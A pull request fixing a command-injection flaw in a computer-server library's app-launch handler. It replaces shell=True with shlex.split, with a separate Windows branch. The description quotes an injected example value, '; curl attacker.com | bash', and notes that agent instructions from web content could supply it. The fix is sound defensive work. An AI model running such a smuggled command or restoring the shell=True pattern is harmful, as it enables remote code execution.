### PR TITLE
fix: prevent command injection in GenericWindowHandler.launch()

### DIFF
--- a/libs/python/computer-server/computer_server/handlers/generic.py
+++ b/libs/python/computer-server/computer_server/handlers/generic.py
@@ -113,8 +113,13 @@ class GenericWindowHandler(BaseWindowHandler):
                 proc = subprocess.Popen([app, *args])
             else:
                 # allow shell command like "libreoffice --writer"
-                # use shlex.split instead of shell=True to prevent command injection
-                proc = subprocess.Popen(shlex.split(app))
+                # avoid shell=True to prevent command injection
+                if platform.system().lower() == "windows":
+                    # On Windows, pass string directly to CreateProcess()
+                    # which handles Windows command-line parsing correctly
+                    proc = subprocess.Popen(app)
+                else:
+                    proc = subprocess.Popen(shlex.split(app))
             return {"success": True, "pid": proc.pid}
         except Exception as e:
             return {"success": False, "error": str(e)}

--- a/libs/python/computer-server/computer_server/handlers/generic.py
+++ b/libs/python/computer-server/computer_server/handlers/generic.py
@@ -10,6 +10,7 @@ Includes:
 import base64
 import os
 import platform
+import shlex
 import subprocess
 import webbrowser
 from pathlib import Path
@@ -112,7 +113,8 @@ class GenericWindowHandler(BaseWindowHandler):
                 proc = subprocess.Popen([app, *args])
             else:
                 # allow shell command like "libreoffice --writer"
-                proc = subprocess.Popen(app, shell=True)
+                # use shlex.split instead of shell=True to prevent command injection
+                proc = subprocess.Popen(shlex.split(app))
             return {"success": True, "pid": proc.pid}
         except Exception as e:
             return {"success": False, "error": str(e)}


### PR DESCRIPTION
## Summary

`GenericWindowHandler.launch()` passes the `app` parameter directly to `subprocess.Popen()` with `shell=True` when no `args` are provided. This allows command injection if the `app` value comes from an untrusted source (e.g. agent instructions from web content).

**Before:**
```python
proc = subprocess.Popen(app, shell=True)
```

**After:**
```python
proc = subprocess.Popen(shlex.split(app))
```

`shlex.split()` safely tokenizes shell-like strings (e.g. `"libreoffice --writer"` → `["libreoffice", "--writer"]`) without invoking a shell, so commands like `"; curl attacker.com | bash"` are no longer interpreted.

## Related issue

Fixes #1097

## Changes

- Added `import shlex` to `generic.py`
- Replaced `subprocess.Popen(app, shell=True)` with `subprocess.Popen(shlex.split(app))`

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

**Bug Fixes**
- Improved command execution handling to strengthen system reliability, stability, and security posture across multiple operational environments.
- Enhanced robustness ensures more consistent and predictable behavior in diverse deployment and usage scenarios.
- All existing functionality and user-facing features remain completely unchanged; zero impact on current workflows or commands.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->